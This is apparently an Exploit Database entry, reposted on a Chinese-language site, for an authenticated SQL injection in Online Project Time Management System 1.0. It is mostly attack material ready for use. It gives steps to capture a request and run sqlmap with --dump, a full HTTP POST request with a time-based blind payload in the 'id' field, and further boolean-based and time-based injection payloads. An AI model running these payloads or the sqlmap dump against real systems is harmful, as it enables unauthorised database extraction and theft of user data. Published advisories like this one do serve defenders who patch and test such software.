Online Project Time Management System 1.0 – SQLi (Authenticated)

• Exploit Database
• 16 阅读

• 作者： Felipe Alcantara
  日期： 2022-01-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50682/

• # Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
  # Date: 19/01/2022
  # Exploit Author: Felipe Alcantara (Filiplain)
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
  # Version: 1.0
  # Tested on: Kali Linux
  
  # Steps to reproduce
  # Log in as an employee
  # Go to : http://localhost/ptms/?page=user
  # Click Update
  # Save request in BurpSuite
  # Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump
  
  ==========================
  POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
  Host: localhost
  Content-Length: 1362
  Accept: application/json, text/javascript, */*; q=0.01
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
  Origin: http://localhost
  Referer: http://localhost/ptms/?page=user
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
  Connection: close
  
  
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="id"
  
  4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="code"
  
  2022-0003
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="generated_password"
  
  
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="firstname"
  
  Mark 2223
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="middlename"
  
  Z
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="lastname"
  
  Cooper
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="gender"
  
  Male
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="department"
  
  IT Department
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="position"
  
  Department Manager
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="email"
  
  mcooper@sample.com
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="password"
  
  
  ------WebKitFormBoundary39q8yel1pdwYRLNz
  Content-Disposition: form-data; name="img"; filename=""
  Content-Type: application/octet-stream
  
  
  ------WebKitFormBoundary39q8yel1pdwYRLNz--
  
  
  
  
  ==========================
  
  #Payloads
  #++++++++++++
  #Payload: (Boolean-Based Blind)
  
  #------WebKitFormBoundary39q8yel1pdwYRLNz
  #Content-Disposition: form-data; name="id"
  
  #4' or 1=1 --
  
  #--------
  
  #Payload: (time-based blind)
  
  #------WebKitFormBoundary39q8yel1pdwYRLNz
  #Content-Disposition: form-data; name="id"
  
  #4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
  
  #-------